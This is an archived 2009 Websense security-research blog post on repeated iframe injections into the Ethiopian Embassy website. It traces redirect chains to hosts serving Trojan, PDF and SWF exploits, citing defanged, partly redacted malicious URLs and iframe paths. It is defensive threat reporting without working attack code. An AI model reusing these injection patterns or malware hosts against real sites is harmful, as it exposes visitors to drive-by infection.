Websense.com / Security Labs / Blogs / Nonstop Web Site Re-Infections

Archived Blog

Nonstop Web Site Re-Infections

06.24.2009 - 2:45 PM

We recently published an alert about the Ethiopian Embassy site being compromised. We wanted to follow up with more detail, to show what the exploits are currently doing.

This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report].

First Malicious Code Injection:

On June 16, 2009, ThreatSeeker detected an obfuscated iframe injection redirecting users to the URL hxxp://[REMOVED].cn/daily_stats/in.cgi?4. At the time, the link was down. A few days later, the link became live, and pointed to a frame (src="http://[REMOVED]s-totonya1.com/1/index.php") containing multiple iframes. The iframes redirected to more malicious files hosted in China (iframe src="data/exp/0.pdf" and iframe src="data/exp/0.swf"). Although those links are not yet live, similar paths on the domain do currently host malicious files (for example, hxxp://[REMOVED]s-totonya1.com/1/data/exp/0.pdf, which uses Exploit.PDF [see VirusTotal report] and hxxp://[REMOVED]s-totonya1.com/1/data/exp/0.swf, which uses Exploit.SWF [see VirusTotal report]).

Second Malicious Injection:

Soon after the last injection, we found a new iframe in the source code. This one pointed to another iframe (src="hxxp://[REMOVED]j.pl:8080/ts/in.cgi?pepsi78") hosted in Poland and redirecting to a host in France (hxxp://[REMOVED]ac.in:8080/index.php). Neither site currently hosts malicious code, but both may be staging sites. So far, we have seen roughly 70 other sites compromised with the same iframe.

Latest Injection:

Attackers are in control and re-compromising the site over and over, potentially infecting visitors with malicious code at any time. These attacks are somewhat of a trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites.

Alert:
Compromised Site: Embassy of Ethiopia in Washington D.C.

Past Embassy Alerts:
Compromised Site: Embassy of Portugal in India
Compromised Sites: The Embassy of the Republic of Azerbaijan in the Republic of Hungary and in Pakistan
Compromised Site: Embassy of Brazil in India Site

Security Researcher: Jack Rasgaitis

Bookmark This Post: